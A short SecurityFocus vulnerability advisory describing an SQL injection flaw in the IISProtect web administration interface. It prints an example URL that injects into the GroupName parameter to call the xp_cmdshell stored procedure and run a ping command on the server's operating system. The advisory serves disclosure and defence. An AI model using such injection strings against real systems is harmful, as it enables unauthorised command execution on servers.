Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

IISProtect Web Administration Interface SQL Injection Vulnerability

The following example was provided:

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.







 

Privacy Statement
Copyright 2009, SecurityFocus